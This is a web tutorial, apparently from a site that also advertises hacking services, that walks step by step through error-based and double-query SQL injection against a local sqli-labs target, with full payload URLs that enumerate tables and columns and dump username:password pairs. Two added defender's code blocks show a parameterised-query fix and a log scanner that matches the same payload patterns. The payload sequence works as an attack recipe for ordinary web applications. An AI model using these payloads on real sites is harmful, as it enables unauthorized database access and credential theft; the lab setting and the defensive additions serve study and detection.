Basic to Advanced Error Based SQL Injection Tutorial

Today we will show you how to hack a website using error-based SQL injection, step by step. In this tutorial you will learn both a basic and an advanced technique for error-based SQL injection. We don't only provide professional hacking services; we also show you how hacking works.

Our target: http://192.168.27.132/sqli/Less-1/?id=2

Let’s do it step by step.

To test whether the site is vulnerable, we request the URL with a single quote appended to the parameter:

http://192.168.27.132/sqli/Less-1/?id=2'

And its output:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''2'' LIMIT 0,1' at line 1

Next we need to find out how many columns the query returns, using ORDER BY:

http://192.168.27.132/sqli/Less-1/?id=2' order by 100--+ : Error: Unknown column '100' in 'order clause'
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%2050--+ : Did not work.
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%2020--+ : Still an error.
http://192.168.27.132/sqli/Less-1/?id=2%27%20order%20by%203--+ : The page loads normally, so the query returns 3 columns.

Now we need to see which columns are reflected in the page:

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,3--+

The page displays 2 and 3, so columns 2 and 3 are the ones we can use to extract data.

Exploiting the Simple Error-Based SQL Injection

This is a simple error-based SQL injection and easy to exploit. We will see how it can be exploited with a few SQL queries.

Getting the Database and the Version

We just need to replace the vulnerable column with version(), and then with database():

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,version()--+
Output: 10.3.18-MariaDB-0+deb10u1

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,database()--+
Output: security

Getting All Table Names

We can also get all the table names of the database 'security'. Here we need the SQL aggregate function group_concat(). For more details, search for "group_concat()".

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22--+
Output: emails,referers,uagents,users

We have the table names. Now we can get the column names for each table.

Getting Column Names

Here we need to replace a few things:
1. group_concat(table_name) becomes group_concat(column_name)
2. information_schema.tables becomes information_schema.columns
3. The where clause becomes where table_name="users"

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22users%22--+
Output: id,username,password,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS

Extracting the username and password

http://192.168.27.132/sqli/Less-1/?id=-2%27%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20users--+
Output: Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4
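The lookup exploited above, as an added defender's example that is not part of the original post: an in-memory SQLite stand-in (not the lab's MariaDB) with the query shape the error message reveals (... id='$id' LIMIT 0,1), beside a parameterised version that also stops echoing the driver's error text. The sample rows and the function names are constructed for this example.

```python
import sqlite3

# Constructed sample rows for a users(id, username, password) table shaped like
# the lab's; the values are invented for this example, not the lab's data.
SAMPLE_USERS = [(1, "alice", "pw-one"), (2, "bob", "pw-two")]


def make_db():
    """In-memory SQLite stand-in for the lab's MariaDB 'security' database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return con


def vulnerable_lookup(con, user_id):
    """Query shape the tutorial's error message reveals (... id='$id' LIMIT 0,1):
    the parameter is pasted into the SQL text and the driver's error is echoed."""
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    try:
        return {"rows": con.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # This is the oracle error-based injection relies on: raw parser detail
        # goes straight back to the client.
        return {"rows": [], "error": str(exc)}


def hardened_lookup(con, user_id):
    """Same lookup with a bound parameter, so the value can never become SQL;
    only a generic message is returned if the query fails."""
    try:
        rows = con.execute("SELECT * FROM users WHERE id=? LIMIT 1",
                           (user_id,)).fetchall()
        return {"rows": rows, "error": None}
    except sqlite3.Error:
        return {"rows": [], "error": "lookup failed"}


if __name__ == "__main__":
    db = make_db()
    for probe in ("2", "2'", "-2' union select 1,2,3-- "):
        print(repr(probe), vulnerable_lookup(db, probe), hardened_lookup(db, probe))
```

With the bound parameter the quote probe and the union payload are compared as literal text against the integer id column and simply match nothing, while the concatenated version errors out or returns attacker-chosen rows.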

Double Query Error-Based SQL Injection

Let's cover one more advanced error-based SQL injection in this post. Remember that error-based SQL injection means forcing the database to generate the errors we want. Sometimes simple errors are not what we want; then we need to send more complex SQL queries to the database. Let's see it step by step.

Another note: this time we need to send a double quote instead of a single quote: http://192.168.27.132/sqli/Less-6/?id=2"

If you send your command like http://192.168.27.132/sqli/Less-6/?id=-2%20order%20by%2050--+ , it does not work anymore. Let's see how we can exploit this SQL injection vulnerability.

Testing the Double Query SQLi in MariaDB

As we need to use some additional functions, we are first going to test the SQL injection in MariaDB locally. Here are the functions we need to know about:

  1. rand(): generates a random floating-point number between 0 and 1.
  2. floor(): returns the largest integer that is not greater than its argument.
  3. limit: an SQL clause used to constrain the number of rows returned.

Let us paste some queries and their output.

MariaDB [(none)]> select rand();
+--------------------+
| rand()             |
+--------------------+
| 0.5695128837316417 |
+--------------------+
1 row in set (0.003 sec)

MariaDB [(none)]> select concat('test','test2');
+------------------------+
| concat('test','test2') |
+------------------------+
| testtest2              |
+------------------------+
1 row in set (0.001 sec)

MariaDB [(none)]> select floor(4.4494949);
+------------------+
| floor(4.4494949) |
+------------------+
|                4 |
+------------------+
1 row in set (0.002 sec)

MariaDB [(none)]> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               0 |
+-----------------+
1 row in set (0.001 sec)

MariaDB [(none)]> select floor(rand()*2);
+-----------------+
| floor(rand()*2) |
+-----------------+
|               1 |
+-----------------+
1 row in set (0.001 sec)

Let us do a subquery test:

select database() from information_schema.tables

MariaDB [(none)]> (select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,floor(rand(0)*2)) a from information_schema.tables group by a) b);
ERROR 1062 (23000): Duplicate entry 'emails:1' for key 'group_key'

Exploiting Error-Based SQL Injection with a Subquery

Our goal is to show you how to exploit a real vulnerability instead of boring you with lots of small examples. But for testing and learning purposes we have set up a local lab. After all, this is some kind of tutorial ... right?

Before going forward, please take some time to understand this query template:

and (select 1 from (select count(*), concat((subquery limit single_row,1), 0x3a, floor(rand(0)*2)) a from information_schema.tables group by a) b)

Here "subquery limit single_row,1" returns exactly one value (the limit offset selects which row), 0x3a is the ':' separator, and a is the alias the group by refers to.

Let's do it step by step.

Getting the database name:

http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

Getting the table names from database "security":

1. http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select table_name from information_schema.tables where table_schema="security" limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

2. http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select table_name from information_schema.tables where table_schema="security" limit 1,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

3. http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select table_name from information_schema.tables where table_schema="security" limit 3,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

Getting the column names:

Username column: http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

Password column: http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--

Extracting data from the columns:

http://192.168.27.132/sqli/Less-6/?id=2" and (select 1 from (select count(*),Concat((select concat(username,0x3a,password) from users limit 0,1),0x3a,floor(rand(0)*2))a from information_schema.tables group by a) b)--
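An added detection example (not from the original post): a small Python scanner that URL-decodes the request target of web-server access-log lines and flags the probe stages used in both sections above (ORDER BY column counting, UNION SELECT, information_schema enumeration, group_concat extraction and the floor(rand(0)*2) double-query). The log lines, the client IP and the signature names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Signatures for the probe stages this tutorial walks through, matched against
# the URL-decoded, lower-cased, whitespace-squeezed query string.
SIGNATURES = {
    "column-count probe": re.compile(r"\border by \d+"),
    "union column probe": re.compile(r"\bunion (all )?select\b"),
    "schema enumeration": re.compile(r"information_schema\.(tables|columns)"),
    "group_concat extraction": re.compile(r"group_concat\("),
    "double-query error": re.compile(r"floor\(rand\(0?\)\*2\)"),
}

# Request line of a combined-format access log: method, target, status code.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_request(target):
    """Return the names of every signature the request's query string matches.
    unquote_plus also turns the trailing '+' of '--+' into the space MySQL needs."""
    query = re.sub(r"\s+", " ", unquote_plus(urlsplit(target).query).lower())
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(lines):
    """One finding per log line whose request matches at least one signature."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target, status = m.groups()
        tags = classify_request(target)
        if tags:
            findings.append({"target": target, "status": int(status), "tags": tags})
    return findings


# Constructed access-log lines replaying the tutorial's own requests (client IP
# and timestamps are made up); the first request is the benign baseline.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 1234',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=2%27%20order%20by%2050--+ HTTP/1.1" 200 987',
    '192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=-2%27%20union%20select%201,2,'
    'group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22security%22--+ HTTP/1.1" 200 1100',
    '192.0.2.10 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-6/?id=2%22%20and%20(select%201%20from%20(select%20count(*),'
    'concat((select%20database()),0x3a,floor(rand(0)*2))a%20from%20information_schema.tables%20group%20by%20a)%20b)-- HTTP/1.1" 200 1050',
]
```

Because every request in the tutorial returns HTTP 200 (the lab prints the database error inside a normal page), status-code alerting alone would miss all of it; the decoded query string is what carries the signal.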

Finally, we would say that error-based SQL injection is a time-consuming process, but it is still better than time-based SQL injection. We can speed up the process by using a Python script or the Burp Suite tool.

Setup your Home SQL Injection LAB: https://github.com/Rock718/sqli-labs-php7

If you have any hacking-related questions, don't hesitate to contact us.
